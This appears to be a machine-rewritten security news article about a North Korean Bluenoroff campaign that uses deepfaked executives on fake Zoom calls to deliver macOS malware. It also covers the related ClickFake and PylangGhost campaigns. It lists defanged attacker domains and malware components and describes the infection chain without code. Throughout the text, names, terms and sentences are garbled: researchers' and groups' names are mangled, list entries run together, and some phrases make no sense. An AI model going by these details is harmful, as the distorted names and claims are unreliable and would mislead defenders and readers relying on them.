The North Korean threat actor known as Bluenoroff has been observed to target employees in the Web3 sector, showing a Zoom call that has been magnified by Deepfaked Company executives to install malware on Apple MacOS devices.
Huntress, who revealed details of the cyber intrusion, said the attack targeted an unnamed Cryptocurrency Foundation employee.
“The message asked for time to talk to employees, and the attackers sent calendar-leigh links to set meeting times,” said security researchers Alden Schmidt, Stuart Ashenbrenbrenner and Jonathan Semon. “The Calendly link was for Google Meet events, but when you click, the URL redirects the end user to a fake zoom domain controlled by the threat actor.”
A few weeks later, the employee was reportedly attending a group zoom meeting, along with other external contacts, which included several deepfakes of known members of the company’s senior leadership.
However, when employees said they couldn’t use the microphone, the synthetic persona urged them to download and install the Zoom extension to address the expected issues. A link to the extension shared via Telegram has downloaded an applescript named “Zoom_sdk_support.scpt.”
This Applescript first opens a legitimate web page in the Zoom Software Development Kit (SDK), but is configured to stealthly download the next stage payload from the remote server (“support(.)us05web-zoom(.)biz”) and runs the shell script.
The script starts by disabling logging for Bash History, checking if Rosetta 2 is installed on a compromised Mac, and if not, install it. Rosetta is software that allows Macs running Apple Silicon to run apps built for Macs with Intel processors (x86_64).
The script then creates a hidden file called “.pwd” and downloads the binary from the malicious Zoom webpage (“web071zoom(.lus/fix/audio-fv/7217417464”). “web071zoom(.) us/fix/audio-tr/7217417464” to get another unspecified payload.
The shell script also prompts the user to provide a system password, wipes down the history of commands executed, and prevents them from leaving the forensic trail. Huntress said the investigation discovered eight different malicious binaries against the victim’s host.
- Telegram 2NIM-based binary responsible for starting the primary backdoor.
- Root Troy V4A fully functional backdoor used to run remote Applescript payload, shell commands and download and run additional malware
- Injectwithdylda C++ binary loader downloaded by root troy V4, then drop two more payloads. Benefit and rapid application To facilitate process injection NIM Implants This allows the operator to issue commands and receive responses asynchronously
- XscreenObjective-C keylogger with the ability to monitor victim keystrokes, clipboard, screens, and command and control (C2) server
- cryptobotGO-based information steeler that can collect cryptocurrency related files from the host
- netchkalmost empty binary designed to generate random numbers forever
Bluenoroff is a subcluster within the Lazarus Group, tracked under the names of charming Pisces, Apt38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima and TA444, and has a history of ATMs for the als class, cryptocurrency business, and Monuprat for Koreans.
The group is best known for coordinating a series of cryptocurrency robberies known as Traderraitor to target employees of organizations engaged in blockchain research using malicious cryptocurrency trading applications. Important cases include the February 2025 hacking Bibit and the March 2022 Axie Infinity.
“Remote workers, especially in the high-risk field, are often the ideal targets for groups like TA444,” Huntress said. “It’s important to train employees to identify common attacks that begin with social engineering related to remote meeting software.”
According to DTEX’s latest assessment of North Korea’s cyberstructure, the APT38 mission no longer existed, becoming Trader Traitor (aka Jade Mizore and UNC4899) and Cryptocore (aka Kegi Chameleon, Cryptomymic, Dangerous Password, Leritul, and became financial craftsmen.
“Tradertraitor appears to have been the most prolific in the DPRK APT group when it comes to cryptocurrency theft and has been the most talented person from the original APT38 effort,” DTEX said. “Cryptocore has been active since at least 2018 and is likely split from Tradertraitor from Apt38.”
Furthermore, the use of audio-issues-themed lures for future victims to infringe their machines with malware is reflected in the evolution of another North Korea-related campaign called contagious interviews to provide another malware named Golgghost using Clickfix-style alerts.
A new iteration called Clickfake interviews will create ads for fake jobs and unfold them so that job seekers copy and run malicious commands under the pretext of addressing access camera and microphone issues on fake websites set up for threat actors to complete employment assessments.
According to Cisco Talos, these cross-platform attacks have evolved further using the Python version of Golangghost, known as Pylangghost. Fake rating sites are spoofing well-known financial entities such as Archblock, Coinbase, Robinhood, Uniswap, and other well-known, and are known to target small sets of users, mostly in India.
“In recent campaigns, the famous Cholima, a threat actor who may be made up of multiple groups, is targeting Windows systems using the Python-based version of Trojan, but continues to deploy Golang-based versions for MACOS users.” “Linux users are not targeted in these latest campaigns.”
Like Golang’s counterpart, Pylangghost can establish contact with a C2 server, allowing attackers to remotely control the infected machine, download/upload files, and steal cookies and credentials from over 80 browser extensions, including password managers and Cryptocurrency Wallets.
“It is not clear why threat actors decided to use a different programming language to create two variations, or why they were originally created,” Talos said. “The structure, naming conventions, and function names are very similar. This indicates that different versions of developers work closely together or are the same person.”
